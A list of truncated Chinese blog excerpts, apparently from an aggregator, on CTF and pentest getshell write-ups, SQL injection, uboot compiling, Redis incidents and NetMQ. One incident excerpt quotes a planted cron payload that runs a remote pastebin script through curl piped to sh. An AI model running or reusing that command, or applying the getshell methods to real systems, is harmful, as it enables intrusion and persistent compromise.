案例鏈接： http://202.112.51.184:8007/ 打開鏈接，發現分了多個頁面： 挨個點擊，大概清楚是上傳指定格式的文件然后在搜索的時候使文件執行從而GetShell，觀察發現點擊每個頁面后出現“?page=xxx"字樣，查看源代碼發現還有隱藏的php ...

本文是i春秋論壇（https://bbs.ichunqiu.com/）的表哥為大家分享一個在實戰過程中會經常遇到的SQL注入題目及解題思路，公眾號旨在為大家提供更多的學習方法與技能技巧，文章僅供學習參考。 這是一個比較基礎的題，在實戰中經常會遇到。比如說前端利用 ...

前言： 本篇文章是關於一次滲透測試中意外getshell的記錄，屬於ueditor v1.3.x 的aspx語言的非網上流傳的getshell方式。由於當時在網上搜索並未發現該種getshell方法，故分享給各位。 經過： 起因是針對某客戶網站進行滲透測試時，發現了一個ueditor編輯器 ...

記一次uboot編譯/經驗/教訓 - 最近學習uboot移植有關的知識，在了解原理后自己編譯uboot，但是出現了好多各式各樣的錯誤，最后換了幾次系統環境之后才找到錯誤來源 1.准備源碼與交叉編譯工具鏈 環境：ubuntu19.04虛擬機 首先從linux公社下載 ...

日志集中式監控平台上線已經有一段時間，但是大部分情況下只是作為發布或者出問題時查看日志的便利工具使用。平時大家都不怎么主動上去看看。於是前幾天把應用的錯誤日志也加上郵件、Hi和短信報警，馬上就收到很多錯誤報警，引起了大家的重視。其中有一個Redis報錯： 看起來挺嚴重的，拿不到Redis連接 ...

zabbix告警突然從某個時間點開始提示CPU使用高，網卡流量也一直居高不下。 首先查看redis日志，發現告警時間點redis主節點被重啟了，發生了主備切換，並且在日志中發現這么一段 [3081] 06 Dec 02:33:28.090 # Client addr=****:35810 ...

起因 偶然間發現redis里有一個陌生key：tightsoft，它的值是：*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh 看key名就知道這肯定不是我們存的，再看value我警覺了，這是要定時執行腳本啊。 分析 ...

Redis是一個高速緩存K-V數據庫，而NetMQ是ZeroMQ的C#實現版本，兩者是完全不同的東西。 最近做游戲服務器的時候想到，如果選擇一個組件來做服務器間通信的話，ZeroMQ絕對是一個不錯的選擇，而我們的服務器是用C#的開發的，就這樣，找到了NetMQ。 NetMQ上手很簡單。總結一下 ...